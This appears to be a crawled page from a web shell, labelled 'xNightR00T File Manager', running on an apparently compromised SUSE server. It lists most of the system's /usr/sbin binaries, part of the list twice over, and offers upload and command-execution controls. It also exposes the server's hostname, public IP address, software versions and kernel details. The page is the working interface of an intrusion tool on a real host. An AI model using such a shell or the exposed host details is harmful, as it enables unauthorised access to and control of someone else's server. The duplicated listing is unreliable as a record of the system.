quotacheck	File	108.52 KB	0755
quotaoff	File	79.98 KB	0755
quotaon	File	79.98 KB	0755
quotastats	File	14.45 KB	0755
raw	File	14.09 KB	0755
rcSuSEfirewall2	File	5.28 KB	0755
rcatd	File	5.28 KB	0755
rcauditd	File	5.28 KB	0755
rcautofs	File	5.28 KB	0755
rcbmc-snmp-proxy	File	5.28 KB	0755
rcbtrfsmaintenance-refresh	File	5.28 KB	0755
rccron	File	5.28 KB	0755
rcexchange-bmc-os-info	File	5.28 KB	0755
rcfstrim	File	5.28 KB	0755
rcgpm	File	5.28 KB	0755
rchaveged	File	5.28 KB	0755
rcipmievd	File	5.28 KB	0755
rcirqbalance	File	5.28 KB	0755
rciscsi	File	5.28 KB	0755
rciscsid	File	5.28 KB	0755
rciscsiuio	File	5.28 KB	0755
rckdump	File	5.28 KB	0755
rckexec-load	File	5.28 KB	0755
rclogrotate	File	5.28 KB	0755
rcmcelog	File	5.28 KB	0755
rcmdmonitor	File	5.28 KB	0755
rcmultipathd	File	5.28 KB	0755
rcmysql	File	11.9 KB	0755
rcnfs	File	5.28 KB	0755
rcnfs-client	File	5.28 KB	0755
rcnfs-server	File	5.28 KB	0755
rcnfsserver	File	5.28 KB	0755
rcnginx	File	5.28 KB	0755
rcnscd	File	5.28 KB	0755
rcntp-wait	File	5.28 KB	0755
rcntpd	File	5.28 KB	0755
rcopenct	File	1.98 KB	0755
rcopenslp	File	37 B	0755
rcpcscd	File	5.28 KB	0755
rcpostfix	File	5.28 KB	0755
rcraw	File	5.28 KB	0755
rcrestorecond	File	5.28 KB	0755
rcrng-tools	File	5.28 KB	0755
rcrpcbind	File	5.28 KB	0755
rcrpmconfigcheck	File	2.47 KB	0755
rcrsyncd	File	5.28 KB	0755
rcrsyslog	File	5.28 KB	0755
rcsaslauthd	File	5.28 KB	0755
rcslpd	File	5.28 KB	0755
rcsmartd	File	5.28 KB	0755
rcsnmpd	File	5.29 KB	0755
rcsnmptrapd	File	3.48 KB	0755
rcsshd	File	5.28 KB	0755
rcvgauthd	File	5.28 KB	0755
rcvmtoolsd	File	5.28 KB	0755
rcvsftpd	File	5.28 KB	0755
rcwicked	File	5.28 KB	0755
rcwickedd	File	5.28 KB	0755
rcwickedd-auto4	File	5.28 KB	0755
rcwickedd-dhcp4	File	5.28 KB	0755
rcwickedd-dhcp6	File	5.28 KB	0755
rcwickedd-nanny	File	5.28 KB	0755
rcxinetd	File	5.28 KB	0755
rcypbind	File	5.28 KB	0755
rdma	File	50.73 KB	0755
readprofile	File	18.13 KB	0755
refresh_initrd	File	1.08 KB	0755
regdbdump	File	14.34 KB	0755
reject	File	10.1 KB	0555
repquota	File	80.14 KB	0755
resize2fs	File	55.39 KB	0755
resizepart	File	54.18 KB	0755
restorecond	File	31.02 KB	0755
rfkill	File	38.17 KB	0755
rmmod	File	236.71 KB	0755
rndc	File	34.95 KB	0755
rndc-confgen	File	18.49 KB	0755
rngd	File	23.56 KB	0755
rollback-reset-registration	File	1.16 KB	0755
rootgrow	File	1.48 KB	0755
routef	File	173 B	0755
routel	File	1.59 KB	0755
rpc.gssd	File	83.79 KB	0755
rpc.idmapd	File	35.22 KB	0755
rpc.mountd	File	266.95 KB	0755
rpc.nfsd	File	23.15 KB	0755
rpc.statd	File	80.1 KB	0755
rpc.svcgssd	File	35.1 KB	0755
rpcdebug	File	14.45 KB	0755
rsyncd	File	428.4 KB	0755
rsyslog-service-prepare	File	755 B	0755
rsyslogd	File	602.45 KB	0755
rtacct	File	40.77 KB	0755
rtcwake	File	42.17 KB	0755
rtmon	File	50.81 KB	0755
rtpr	File	37 B	0755
rtstat	File	18.87 KB	0755
run_init	File	10.42 KB	0755
runuser	File	58.1 KB	0755
safe_finger	File	10.38 KB	0755
saslauthd	File	87.77 KB	0755
sasldblistusers2	File	18.43 KB	0755
saslpasswd2	File	14.52 KB	0755
save_y2logs	File	3.25 KB	0755
schema2ldif	File	1.15 KB	0755
sefcontext_compile	File	58.99 KB	0755
selabel_digest	File	10.38 KB	0755
selabel_lookup	File	10.32 KB	0755
selabel_lookup_best_match	File	10.34 KB	0755
selabel_partial_match	File	10.27 KB	0755
selinux-ready	File	6.24 KB	0755
selinux_restorecon	File	14.38 KB	0755
selinuxconlist	File	10.29 KB	0755
selinuxdefcon	File	10.31 KB	0755
selinuxenabled	File	6.21 KB	0755
selinuxexeccon	File	6.29 KB	0755
semanage	File	36.23 KB	0755
semodule	File	23.37 KB	0755
sendmail	File	27.01 KB	0755
service	File	5.28 KB	0755
sestatus	File	14.55 KB	0755
setDefaultJava	File	572 B	0755
setSystemQuotas.pl	File	3.84 KB	0755
setctsid	File	10.33 KB	0755
setenforce	File	6.26 KB	0755
setquota	File	88.23 KB	0755
setquota-ldap.pl	File	5.9 KB	0755
setsebool	File	14.49 KB	0755
sfdisk	File	122.17 KB	0755
sgdisk	File	162.94 KB	0755
showmount	File	18.84 KB	0755
slpd	File	155.53 KB	0755
sm-notify	File	51.26 KB	0755
smart_agetty	File	2.03 KB	0755
smartctl	File	709.05 KB	0755
smartd	File	644.68 KB	0755
smtp-sink	File	31.73 KB	0755
smtp-source	File	22.75 KB	0755
snapperd	File	212.05 KB	0755
snmpd	File	31.02 KB	0755
snmptrapd	File	31.09 KB	0755
sntp	File	231.6 KB	0755
ss	File	125.32 KB	0755
sshd	File	869.2 KB	0755
sshd-gen-keys-start	File	151 B	0755
start-ntpd	File	5.46 KB	0755
start-statd	File	535 B	0755
sulogin	File	46.1 KB	0755
swaplabel	File	14.09 KB	0755
swapoff	File	18.09 KB	0755
swapon	File	46.34 KB	0755
switch_root	File	14.1 KB	0755
sysconf_addword	File	2.64 KB	0755
sysctl	File	22.56 KB	0755
systemd-sysv-convert	File	4.7 KB	0755
tc	File	403.02 KB	0755
tcpd	File	10.27 KB	0755
tcpdchk	File	22.63 KB	0755
tcpdmatch	File	22.57 KB	0755
tcpdump	File	836.82 KB	0755
testsaslauthd	File	14.38 KB	0755
thin_check	File	1.2 MB	0755
thin_delta	File	1.2 MB	0755
thin_dump	File	1.2 MB	0755
thin_ls	File	1.2 MB	0755
thin_metadata_size	File	1.2 MB	0755
thin_repair	File	1.2 MB	0755
thin_restore	File	1.2 MB	0755
thin_rmap	File	1.2 MB	0755
thin_trim	File	1.2 MB	0755
tickadj	File	6.09 KB	0755
tipc	File	54.59 KB	0755
togglesebool	File	10.31 KB	0755
tracepath	File	14.04 KB	0755

Name

Type

Size

Permission

Actions

Check

File

190 B

0755

OCICLI

File

441 B

0755

OneClickInstallCLI

File

441 B

0755

OneClickInstallUI

File

99 B

0755

OneClickInstallUrlHandler

File

99 B

0755

SUSEConnect

File

637 B

0755

SUSEfirewall2

File

84.6 KB

0755

SuSEfirewall2

File

84.6 KB

0755

File

10.1 KB

0555

accessdb

File

10.63 KB

0755

addgnupghome

File

3.05 KB

0755

addpart

File

22.1 KB

0755

adjtimex

File

43.52 KB

0755

agetty

File

58.19 KB

0755

alternatives

File

42.66 KB

0755

applySystemQuotas.pl

File

3.15 KB

0755

applygnupgdefaults

File

2.21 KB

0755

arpd

File

50.96 KB

0755

arping

File

22.04 KB

0755

atd

File

26.84 KB

0755

atmel_fwl

File

1.67 KB

0755

atrun

File

67 B

0755

audispd

File

38.18 KB

0750

auditctl

File

42.23 KB

0750

auditd

File

110.24 KB

0750

augenrules

File

3.7 KB

0750

aureport

File

98.16 KB

0755

ausearch

File

106.17 KB

0755

automount

File

297.86 KB

0755

autrace

File

14.09 KB

0750

avcstat

File

10.4 KB

0755

badblocks

File

26.66 KB

0755

biosdecode

File

19.02 KB

0755

blkdiscard

File

26.1 KB

0755

blkid

File

102.2 KB

0755

blkmapd

File

26.66 KB

0755

blkzone

File

62.17 KB

0755

blockdev

File

54.17 KB

0755

bmc-snmp-proxy

File

9.91 KB

0755

bridge

File

75.07 KB

0755

btrfs

File

633.27 KB

0755

btrfs-convert

File

352.66 KB

0755

btrfs-debug-tree

File

316.2 KB

0755

btrfs-image

File

340.34 KB

0755

btrfs-show-super

File

316.41 KB

0755

btrfs-zero-log

File

312.16 KB

0755

btrfsck

File

633.27 KB

0755

btrfstune

File

316.16 KB

0755

cache_check

File

1.2 MB

0755

cache_dump

File

1.2 MB

0755

cache_metadata_size

File

1.2 MB

0755

cache_repair

File

1.2 MB

0755

cache_restore

File

1.2 MB

0755

cache_writeback

File

1.2 MB

0755

calc_tickadj

File

2.78 KB

0755

cfdisk

File

90.53 KB

0755

cgdisk

File

167.09 KB

0755

chat

File

26.55 KB

0755

chcpu

File

38.09 KB

0755

check_mail_queue

File

477 B

0755

chpasswd

File

54.94 KB

0755

cifs.idmap

File

14.17 KB

0755

cifs.upcall

File

34.36 KB

0755

clockdiff

File

18.24 KB

0755

config.postfix

File

43.68 KB

0755

convertquota

File

75.8 KB

0755

cracklib-check

File

6.26 KB

0755

cracklib-format

File

218 B

0755

cracklib-packer

File

10.28 KB

0755

cracklib-unpacker

File

6.24 KB

0755

crda

File

18.52 KB

0755

create-cracklib-dict

File

990 B

0755

cron

File

74.82 KB

0755

cryptconfig

File

63.26 KB

0755

cryptsetup

File

91.71 KB

0755

cryptsetup-reencrypt

File

90.3 KB

0755

ctrlaltdel

File

34.1 KB

0755

ctstat

File

18.87 KB

0755

cupsaccept

File

10.1 KB

0555

cupsdisable

File

10.1 KB

0555

cupsenable

File

10.1 KB

0555

cupsreject

File

10.1 KB

0555

ddns-confgen

File

18.5 KB

0755

debugfs

File

187.7 KB

0755

delpart

File

22.1 KB

0755

depmod

File

236.71 KB

0755

devlink

File

50.7 KB

0755

dmidecode

File

82.45 KB

0755

dnssec-checkds

File

922 B

0755

dnssec-coverage

File

924 B

0755

dnssec-dsfromkey

File

55.32 KB

0755

dnssec-importkey

File

55.32 KB

0755

dnssec-keyfromlabel

File

59.27 KB

0755

dnssec-keygen

File

67.27 KB

0755

dnssec-keymgr

File

920 B

0755

dnssec-revoke

File

51.21 KB

0755

dnssec-settime

File

59.26 KB

0755

dnssec-signzone

File

108.13 KB

0755

dnssec-verify

File

51.2 KB

0755

dosfsck

File

54.58 KB

0755

dosfslabel

File

50.57 KB

0755

dumpe2fs

File

26.89 KB

0755

e2freefrag

File

10.39 KB

0755

e2fsck

File

289.48 KB

0755

e2image

File

30.98 KB

0755

e2label

File

99.89 KB

0755

e2undo

File

18.55 KB

0755

e4crypt

File

22.56 KB

0755

e4defrag

File

26.59 KB

0755

edquota

File

84.2 KB

0755

edquota_editor

File

1.21 KB

0755

efibootdump

File

18.56 KB

0755

efibootmgr

File

43.89 KB

0755

era_check

File

1.2 MB

0755

era_dump

File

1.2 MB

0755

era_invalidate

File

1.2 MB

0755

era_restore

File

1.2 MB

0755

ethtool

File

291.43 KB

0755

eventlogadm

File

38.1 KB

0755

exchange-bmc-os-info

File

7.75 KB

0755

exportfs

File

63.13 KB

0755

fatlabel

File

50.57 KB

0755

fatresize

File

10.37 KB

0755

fbtest

File

10.4 KB

0755

fdformat

File

26.1 KB

0755

fdisk

File

134.22 KB

0755

filefrag

File

14.38 KB

0755

findfs

File

10.09 KB

0755

fixmbr

File

10.25 KB

0755

flushb

File

43 B

0755

fping

File

30.63 KB

0755

fping6

File

30.64 KB

0755

fsck

File

46.14 KB

0755

fsck.btrfs

File

1.16 KB

0755

fsck.cramfs

File

34.13 KB

0755

fsck.ext2

File

289.48 KB

0755

fsck.ext3

File

289.48 KB

0755

fsck.ext4

File

289.48 KB

0755

fsck.fat

File

54.58 KB

0755

fsck.minix

File

106.2 KB

0755

fsck.msdos

File

54.58 KB

0755

fsck.vfat

File

54.58 KB

0755

fsfreeze

File

10.09 KB

0755

fstrim

File

58.17 KB

0755

gdisk

File

174.88 KB

0755

genhomedircon

File

23.37 KB

0755

genl

File

54.91 KB

0755

genrandom

File

10.33 KB

0755

getenforce

File

6.23 KB

0755

getsebool

File

10.32 KB

0755

getsysinfo

File

1.66 KB

0755

glibc_post_upgrade

File

732.43 KB

0700

gpm

File

96.21 KB

0755

groupadd

File

53.81 KB

0755

groupdel

File

49.6 KB

0755

groupmod

File

60.13 KB

0755

growpart

File

21.3 KB

0755

grpck

File

45.66 KB

0755

grub2-bios-setup

File

1.03 MB

0755

grub2-check-default

File

2.38 KB

0755

grub2-install

File

1.29 MB

0755

grub2-macbless

File

1.01 MB

0755

grub2-mkconfig

File

8.48 KB

0755

grub2-ofpathname

File

228.11 KB

0755

grub2-once

File

6.98 KB

0755

grub2-probe

File

1.02 MB

0755

grub2-reboot

File

4.01 KB

0755

grub2-set-default

File

3.47 KB

0755

grub2-sparc64-setup

File

1.03 MB

0755

hardlink

File

14.34 KB

0755

haveged

File

18.64 KB

0755

hdparm

File

100.74 KB

0755

hwclock

File

86.3 KB

0755

hwinfo

File

33.91 KB

0755

icmpinfo

File

14.76 KB

0755

iconvconfig

File

30.7 KB

0755

ifdhandler

File

200.66 KB

0755

ifdproxy

File

200.47 KB

0755

ifenslave

File

18.8 KB

0755

ifrename

File

30.55 KB

0755

ifstat

File

42.91 KB

0755

iftop

File

59.66 KB

0755

ifup

File

5.82 KB

0755

in.rdisc

File

22.13 KB

0755

inputattach

File

16.52 KB

0755

insmod

File

236.71 KB

0755

insserv

File

6.06 KB

0755

install_acx100_firmware

File

1.4 KB

0755

install_intersil_firmware

File

1.3 KB

0755

integritysetup

File

44.65 KB

0755

iotop

File

495 B

0755

File

498 KB

0755

ip6tables

File

85.81 KB

0755

ip6tables-batch

File

44.09 KB

0755

ip6tables-restore

File

85.81 KB

0755

ip6tables-save

File

85.81 KB

0755

ipmievd

File

408.33 KB

0755

iptables

File

85.81 KB

0755

iptables-apply

File

3.38 KB

0755

iptables-batch

File

44.09 KB

0755

iptables-restore

File

85.81 KB

0755

iptables-save

File

85.81 KB

0755

irqbalance

File

50.75 KB

0755

isc-hmac-fixup

File

10.4 KB

0755

itox

File

26.46 KB

0755

iwconfig

File

26.48 KB

0755

iwevent

File

18.48 KB

0755

iwgetid

File

14.29 KB

0755

iwlist

File

34.63 KB

0755

iwpriv

File

14.37 KB

0755

iwspy

File

14.32 KB

0755

kbdsettings

File

1.17 KB

0755

kdump

File

10.32 KB

0755

kdumptool

File

520.46 KB

0755

kexec

File

255.5 KB

0755

kexec-bootloader

File

6.2 KB

0755

klogconsole

File

6.28 KB

0744

ldattach

File

30.1 KB

0755

lnstat

File

18.87 KB

0755

load_policy

File

10.3 KB

0755

lockdev

File

10.23 KB

2755

logrotate

File

71.23 KB

0755

logsave

File

10.41 KB

0755

logwatch

File

57.61 KB

0755

losetup

File

98.76 KB

0755

lpadmin

File

26.09 KB

0555

lpc

File

14.15 KB

0555

lpinfo

File

10.09 KB

0555

lpmove

File

10.09 KB

0555

lsmod

File

236.71 KB

0755

lsmsr

File

121.91 KB

0755

lvm

File

2.07 MB

0555

lvmconf

File

12.55 KB

0555

lwepgen

File

10.2 KB

0755

matchpathcon

File

10.36 KB

0755

mcelog

File

143.45 KB

0755

mk_isdnhwdb

File

34.54 KB

0755

mkdict

File

218 B

0755

mkdosfs

File

27.06 KB

0755

mkdumprd

File

7.13 KB

0755

mke2fs

File

120.23 KB

0755

mkfs

File

10.09 KB

0755

mkfs.bfs

File

26.1 KB

0755

mkfs.btrfs

File

332.27 KB

0755

mkfs.cramfs

File

34.11 KB

0755

mkfs.ext2

File

120.23 KB

0755

mkfs.ext3

File

120.23 KB

0755

mkfs.ext4

File

120.23 KB

0755

mkfs.fat

File

27.06 KB

0755

mkfs.minix

File

94.19 KB

0755

mkfs.msdos

File

27.06 KB

0755

mkfs.vfat

File

27.06 KB

0755

mklost+found

File

10.32 KB

0755

mkpostfixcert

File

5.85 KB

0755

mksubvolume

File

67.23 KB

0755

mkswap

File

94.18 KB

0755

modinfo

File

236.71 KB

0755

modprobe

File

236.71 KB

0755

mount.crypt

File

34.98 KB

0755

mount.fuse

File

10.32 KB

0755

mount.vmhgfs

File

42.82 KB

0755

mountstats

File

23.88 KB

0755

mountstats_0_3

File

35.15 KB

0755

mysqld

File

18.61 MB

0755

named-journalprint

File

10.32 KB

0755

netscsid

File

107.96 KB

0555

newusers

File

74.25 KB

0755

nfnl_osf

File

14.4 KB

0755

nfsidmap

File

18.65 KB

0755

nfsiostat

File

23.55 KB

0755

nfsstat

File

29.07 KB

0755

nginx

File

7.94 MB

0755

nologin

File

10.09 KB

0755

nscd

File

152.22 KB

0755

nsec3hash

File

10.31 KB

0755

nstat

File

22.7 KB

0755

ntp-keygen

File

159.73 KB

0755

ntp-wait

File

3.12 KB

0755

ntpd

File

855.16 KB

0755

ntpdate

File

79.23 KB

0755

ntpdc

File

228.16 KB

0755

ntpq

File

270.23 KB

0755

ntptime

File

18.22 KB

0755

ntptrace

File

3.48 KB

0755

one-context-run

File

1.77 KB

0755

one-contextd

File

9.12 KB

0755

open_init_pty

File

10.36 KB

0755

openct-control

File

192.26 KB

0755

ownership

File

10.37 KB

0755

packer

File

10.28 KB

0755

pam-config

File

199.05 KB

0755

parted

File

75.5 KB

0755

partprobe

File

10.37 KB

0755

partx

File

98.5 KB

0755

pcscd

File

115.78 KB

0755

pdata_tools

File

1.2 MB

0755

pivot_root

File

10.1 KB

0755

pluginviewer

File

14.55 KB

0755

plymouth-set-default-theme

File

6.21 KB

0755

plymouthd

File

83.75 KB

0755

pmt-ehd

File

26.88 KB

0755

pmvarrun

File

14.47 KB

0755

postalias

File

18.64 KB

0755

postcat

File

18.61 KB

0755

postconf

File

176.46 KB

0755

postdrop

File

14.73 KB

2755

postfix

File

14.5 KB

0755

postkick

File

10.36 KB

0755

postlock

File

10.41 KB

0755

postlog

File

10.57 KB

0755

postmap

File

18.6 KB

0755

postmulti

File

27.05 KB

0755

postqueue

File

22.75 KB

2755

postsuper

File

23.02 KB

0755

pppd

File

354.42 KB

0755

pppdump

File

47.59 KB

0755

pppoe-discovery

File

18.51 KB

0555

pppstats

File

14.38 KB

0755

pptp

File

59.59 KB

0755

pptp-command

File

22.74 KB

0755

pptpsetup

File

6.84 KB

0755

pwck

File

50.81 KB

0755

pwconv

File

46.66 KB

0755

pwunconv

File

37.28 KB

0755

qmqp-source

File

18.65 KB

0755

quota_nld

File

79.86 KB

0755

quotacheck

File

108.52 KB

0755

quotaoff

File

79.98 KB

0755

quotaon

File

79.98 KB

0755

quotastats

File

14.45 KB

0755

raw

File

14.09 KB

0755

rcSuSEfirewall2

File

5.28 KB

0755

rcatd

File

5.28 KB

0755

rcauditd

File

5.28 KB

0755

rcautofs

File

5.28 KB

0755

rcbmc-snmp-proxy

File

5.28 KB

0755

rcbtrfsmaintenance-refresh

File

5.28 KB

0755

rccron

File

5.28 KB

0755

rcexchange-bmc-os-info

File

5.28 KB

0755

rcfstrim

File

5.28 KB

0755

rcgpm

File

5.28 KB

0755

rchaveged

File

5.28 KB

0755

rcipmievd

File

5.28 KB

0755

rcirqbalance

File

5.28 KB

0755

rciscsi

File

5.28 KB

0755

rciscsid

File

5.28 KB

0755

rciscsiuio

File

5.28 KB

0755

rckdump

File

5.28 KB

0755

rckexec-load

File

5.28 KB

0755

rclogrotate

File

5.28 KB

0755

rcmcelog

File

5.28 KB

0755

rcmdmonitor

File

5.28 KB

0755

rcmultipathd

File

5.28 KB

0755

rcmysql

File

11.9 KB

0755

rcnfs

File

5.28 KB

0755

rcnfs-client

File

5.28 KB

0755

rcnfs-server

File

5.28 KB

0755

rcnfsserver

File

5.28 KB

0755

rcnginx

File

5.28 KB

0755

rcnscd

File

5.28 KB

0755

rcntp-wait

File

5.28 KB

0755

rcntpd

File

5.28 KB

0755

rcopenct

File

1.98 KB

0755

rcopenslp

File

37 B

0755

rcpcscd

File

5.28 KB

0755

rcpostfix

File

5.28 KB

0755

rcraw

File

5.28 KB

0755

rcrestorecond

File

5.28 KB

0755

rcrng-tools

File

5.28 KB

0755

rcrpcbind

File

5.28 KB

0755

rcrpmconfigcheck

File

2.47 KB

0755

rcrsyncd

File

5.28 KB

0755

rcrsyslog

File

5.28 KB

0755

rcsaslauthd

File

5.28 KB

0755

rcslpd

File

5.28 KB

0755

rcsmartd

File

5.28 KB

0755

rcsnmpd

File

5.29 KB

0755

rcsnmptrapd

File

3.48 KB

0755

rcsshd

File

5.28 KB

0755

rcvgauthd

File

5.28 KB

0755

rcvmtoolsd

File

5.28 KB

0755

rcvsftpd

File

5.28 KB

0755

rcwicked

File

5.28 KB

0755

rcwickedd

File

5.28 KB

0755

rcwickedd-auto4

File

5.28 KB

0755

rcwickedd-dhcp4

File

5.28 KB

0755

rcwickedd-dhcp6

File

5.28 KB

0755

rcwickedd-nanny

File

5.28 KB

0755

rcxinetd

File

5.28 KB

0755

rcypbind

File

5.28 KB

0755

rdma

File

50.73 KB

0755

readprofile

File

18.13 KB

0755

refresh_initrd

File

1.08 KB

0755

regdbdump

File

14.34 KB

0755

reject

File

10.1 KB

0555

repquota

File

80.14 KB

0755

resize2fs

File

55.39 KB

0755

resizepart

File

54.18 KB

0755

restorecond

File

31.02 KB

0755

rfkill

File

38.17 KB

0755

rmmod

File

236.71 KB

0755

rndc

File

34.95 KB

0755

rndc-confgen

File

18.49 KB

0755

rngd

File

23.56 KB

0755

rollback-reset-registration

File

1.16 KB

0755

rootgrow

File

1.48 KB

0755

routef

File

173 B

0755

routel

File

1.59 KB

0755

rpc.gssd

File

83.79 KB

0755

rpc.idmapd

File

35.22 KB

0755

rpc.mountd

File

266.95 KB

0755

rpc.nfsd

File

23.15 KB

0755

rpc.statd

File

80.1 KB

0755

rpc.svcgssd

File

35.1 KB

0755

rpcdebug

File

14.45 KB

0755

rsyncd

File

428.4 KB

0755

rsyslog-service-prepare

File

755 B

0755

rsyslogd

File

602.45 KB

0755

rtacct

File

40.77 KB

0755

rtcwake

File

42.17 KB

0755

rtmon

File

50.81 KB

0755

rtpr

File

37 B

0755

rtstat

File

18.87 KB

0755

run_init

File

10.42 KB

0755

runuser

File

58.1 KB

0755

safe_finger

File

10.38 KB

0755

saslauthd

File

87.77 KB

0755

sasldblistusers2

File

18.43 KB

0755

saslpasswd2

File

14.52 KB

0755

save_y2logs

File

3.25 KB

0755

schema2ldif

File

1.15 KB

0755

sefcontext_compile

File

58.99 KB

0755

selabel_digest

File

10.38 KB

0755

selabel_lookup

File

10.32 KB

0755

selabel_lookup_best_match

File

10.34 KB

0755

selabel_partial_match

File

10.27 KB

0755

selinux-ready

File

6.24 KB

0755

selinux_restorecon

File

14.38 KB

0755

selinuxconlist

File

10.29 KB

0755

selinuxdefcon

File

10.31 KB

0755

selinuxenabled

File

6.21 KB

0755

selinuxexeccon

File

6.29 KB

0755

semanage

File

36.23 KB

0755

semodule

File

23.37 KB

0755

sendmail

File

27.01 KB

0755

service

File

5.28 KB

0755

sestatus

File

14.55 KB

0755

setDefaultJava

File

572 B

0755

setSystemQuotas.pl

File

3.84 KB

0755

setctsid

File

10.33 KB

0755

setenforce

File

6.26 KB

0755

setquota

File

88.23 KB

0755

setquota-ldap.pl

File

5.9 KB

0755

setsebool

File

14.49 KB

0755

sfdisk

File

122.17 KB

0755

sgdisk

File

162.94 KB

0755

showmount

File

18.84 KB

0755

slpd

File

155.53 KB

0755

sm-notify

File

51.26 KB

0755

smart_agetty

File

2.03 KB

0755

smartctl

File

709.05 KB

0755

smartd

File

644.68 KB

0755

smtp-sink

File

31.73 KB

0755

smtp-source

File

22.75 KB

0755

snapperd

File

212.05 KB

0755

snmpd

File

31.02 KB

0755

snmptrapd

File

31.09 KB

0755

sntp

File

231.6 KB

0755

File

125.32 KB

0755

sshd

File

869.2 KB

0755

sshd-gen-keys-start

File

151 B

0755

start-ntpd

File

5.46 KB

0755

start-statd

File

535 B

0755

sulogin

File

46.1 KB

0755

swaplabel

File

14.09 KB

0755

swapoff

File

18.09 KB

0755

swapon

File

46.34 KB

0755

switch_root

File

14.1 KB

0755

sysconf_addword

File

2.64 KB

0755

sysctl

File

22.56 KB

0755

systemd-sysv-convert

File

4.7 KB

0755

File

403.02 KB

0755

tcpd

File

10.27 KB

0755

tcpdchk

File

22.63 KB

0755

tcpdmatch

File

22.57 KB

0755

tcpdump

File

836.82 KB

0755

testsaslauthd

File

14.38 KB

0755

thin_check

File

1.2 MB

0755

thin_delta

File

1.2 MB

0755

thin_dump

File

1.2 MB

0755

thin_ls

File

1.2 MB

0755

thin_metadata_size

File

1.2 MB

0755

thin_repair

File

1.2 MB

0755

thin_restore

File

1.2 MB

0755

thin_rmap

File

1.2 MB

0755

thin_trim

File

1.2 MB

0755

tickadj

File

6.09 KB

0755

tipc

File

54.59 KB

0755

togglesebool

File

10.31 KB

0755

tracepath

File

14.04 KB

0755

tracepath6

File

14.04 KB

0755

traceroute

File

67.19 KB

0755

traceroute6

File

67.19 KB

0755

try-from

File

10.23 KB

0755

tsig-keygen

File

18.5 KB

0755

tune2fs

File

99.89 KB

0755

tunelp

File

26.1 KB

0755

umount.crypt

File

34.98 KB

0755

umount.udisks2

File

10.35 KB

0755

update-alternatives

File

42.66 KB

0755

update-ca-certificates

File

1.59 KB

0755

update-leap

File

11.73 KB

0755

update-smart-drivedb

File

13.8 KB

0755

useradd

File

119.58 KB

0755

useradd.local

File

940 B

0755

userdel

File

78.44 KB

0755

userdel-post.local

File

575 B

0755

userdel-pre.local

File

659 B

0755

userdel.local

File

261 B

0744

usermod

File

111.39 KB

0755

vconfig

File

14.31 KB

0755

veritysetup

File

44.45 KB

0755

vigr

File

51.98 KB

0755

vipw

File

51.98 KB

0755

visudo

File

211.05 KB

0755

vmcore-dmesg

File

18.38 KB

0755

vpddecode

File

14.38 KB

0755

vsftpd

File

156.36 KB

0755

warnquota

File

92.23 KB

0755

wicked

File

307.94 KB

0755

wickedd

File

18.42 KB

0755

wickedd-nanny

File

56.16 KB

0755

wipefs

File

38.1 KB

0755

wiper.sh

File

27.43 KB

0755

xconv.pl

File

3.11 KB

0755

xfs_admin

File

1.35 KB

0755

xfs_bmap

File

638 B

0755

xfs_copy

File

383.15 KB

0755

xfs_db

File

629.09 KB

0755

xfs_estimate

File

10.33 KB

0755

xfs_freeze

File

767 B

0755

xfs_fsr

File

30.76 KB

0755

xfs_growfs

File

375.07 KB

0755

xfs_info

File

472 B

0755

xfs_io

File

152.15 KB

0755

xfs_logprint

File

407.01 KB

0755

xfs_mdrestore

File

363.03 KB

0755

xfs_metadump

File

747 B

0755

xfs_mkfile

File

1007 B

0755

xfs_ncheck

File

650 B

0755

xfs_quota

File

86.77 KB

0755

xfs_rtcp

File

14.41 KB

0755

xfs_spaceman

File

34.6 KB

0755

xinetd

File

171.77 KB

0755

xqmstats

File

14.42 KB

0755

xtables-multi

File

85.81 KB

0755

yast

File

12.4 KB

0755

yast2

File

12.4 KB

0755

ypbind

File

51.31 KB

0755

yppoll

File

14.52 KB

0755

ypset

File

10.45 KB

0755

yptest

File

18.59 KB

0755

zdump

File

42.47 KB

0755

zendctl

File

8.02 KB

0755

zic

File

50.55 KB

0755

zramctl

File

98.29 KB

0755

zypp-refresh

File

34.27 KB

0755

zypper-log

File

5.13 KB

0755

Server Info

Hostname: sles125-zend-seiko

IP Address: 123.30.208.48

PHP Version: 7.4.19

Server Software: nginx/1.18.0

HDD Total Space: 38.02 GB

HDD Free Space: 4.58 GB

Total Domains in Server: 1

System: Linux sles125-zend-seiko 4.12.14-122.83-default #1 SMP Tue Aug 3 08:37:22 UTC 2021 (c86c48c) x86_64

System Info

Select Feature:

xNightR00T File Manager

Upload:

Command:

Filemanager

Server Info

System Info

User Info

xNightR00T File Manager

Edit File:

Create Folder

Create File

Change Permission

Rename

Confirm Delete

Upload:

Command:

Filemanager

Server Info

System Info

User Info